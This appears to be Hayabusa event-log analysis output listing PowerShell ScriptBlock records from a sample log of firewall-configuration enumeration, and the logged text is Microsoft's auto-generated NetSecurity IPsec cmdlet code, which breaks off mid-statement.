[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${User}, [Parameter(ParameterSetName='ByIPsecRuleName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Machine}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Param",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"eterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [System.Management.Automation.WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Profiles'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = 
${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; 
ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
